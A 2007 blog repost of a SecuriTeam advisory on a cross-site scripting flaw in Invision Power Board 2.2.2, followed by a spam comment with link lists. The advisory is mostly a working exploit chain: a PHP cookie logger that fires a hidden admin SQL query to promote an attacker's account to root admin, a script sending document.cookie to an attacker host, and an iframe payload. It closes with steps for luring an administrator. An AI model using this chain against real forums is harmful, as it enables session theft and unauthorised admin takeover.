Search This Blog

Sunday, June 03, 2007

[EXPL] Invision Power Board Cross Site Scripting Vulnerability

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html


- - - - - - - - -

Invision Power Board Cross Site Scripting Vulnerability
------------------------------------------------------------------------


SUMMARY

A vulnerability in Invision Power Board allows remote attackers to cause a
cross site scripting vulnerability which in turn can be used to cause the
administrator of the form, or any other privileged user to execute
arbitrary commands (SQL commands), the following exploit code can be used
to test your system for the mentioned vulnerability.

DETAILS

Vulnerable Systems:
* Invision Power Board version 2.2.2

Exploit:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
#
# Invision Power Board 2.2.2 Cross Site Scripting vulnerability
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# Vendor site: http://www.invisionboard.com/
# Vulnerability found by Iron (http://www.ironwarez.info)
#
# Greets to all RootShell Security Group members
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# The vulnerability:
# Open up any php file in /jscripts/folder_rte_files
# See:

var editor_id = <?php print
'"'.trim($_REQUEST['editorid']).'";'; ?>

#
# $_REQUEST['editorid'] isn't sanitized in any way, so allows
# other uses to execute their own code.
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# PoC (Log cookies & run SQL query)
#
# Requirements: server supporting PHP, user account on
# target forum, database prefix needs to be known.
#
# Create a file called name.php on your webserver and put this code in it:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#

<?php
$target = "http://www.yourtarget.com/forum"; #Target forum without
trailing slash
$prefix = "ibf_"; #Database prefix, default: ibf_
$member = 22; #Member id to promote
$newgroup = 4; # The id of the new group to promote, normally 4 is root
admin

$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];

$data = $_GET['c'];
$time = date("Y-m-d G:i:s A");
$text = "Time:
".$time."\nIP:".$ip."\nReferer:".$referer."\nUser-Agent:".$agent."\nCookie:".$data."\n\n";

$file = fopen('log.txt' , 'a');
fwrite($file,$text);
fclose($file);
if(preg_match("/ipb_admin_session_id=([0-9a-z]{32});/",$data,$stuff))
{
print '<iframe width=0 height=0
src="'.$target.'/admin/index.php?adsess='.$stuff[1].'&act=sql&code=runsql&section=admin&query=UPDATE+'.$prefix.'members+SET+mgroup+%3D+%27'.$newgroup.'%27+WHERE+id+%3D+%27'.$member.'%27&st="></iframe>';
}
?>
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# Also create a file in the same directory named "log.txt" and chmod it
777
#
# Now, create a file called script.js on your webserver, put this code in
it:
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#

document.location="http://www.yourownsite.com/path/to/file/name.php?c="+document.cookie;

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
#
# And, last but not least, create a file that combines those two ;)
# Name it blah.html and put this code in it:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#

<iframe border=0
src="http://www.targetforum.com/forum_folder/jscripts/folder_rte_files/module_table.php?editorid=//--></script><script src=http://www.yourownsite.com/path/to/file/script.js>" width=0 height=0></iframe>

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# Now, post a message on the forum or send a pm to your target with the
link to the html page.
# If a normal user views the page, his cookies
# will be logged, funny. If an admin visits the page and he has an
admin_session_id cookie set,
# he will add you to the root admin group without even knowing ;).


ADDITIONAL INFORMATION

The information has been provided by Iron.
The original article can be found at: <http://www.ironwarez.info>

http://www.ironwarez.info

========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

1 comment:

Anonymous said...

a4tech wop 49 драйвер
драйвера lg km900
как установить драйвер принтера hp
драйвер для принтера samsung 2015
загрузка драйверов nvidia


http://www.cakephp.us/member.php?action=profile&uid=3559
http://forum.taothaotruyen.vn/member.php/31394-Arpoorta
http://uzi-chat.byethost3.com/member.php?action=profile&uid=3684
http://calabriainf.ru/forum/memberlist.php?mode=viewprofile&u=91679
http://www.forumcartomanzia.com/memberlist.php?mode=viewprofile&u=143984

http://flavors.me/warblareso
http://flavors.me/erdayzdajom
http://flavors.me/plancestaso
http://flavors.me/armarphypu
http://flavors.me/rollletzpoda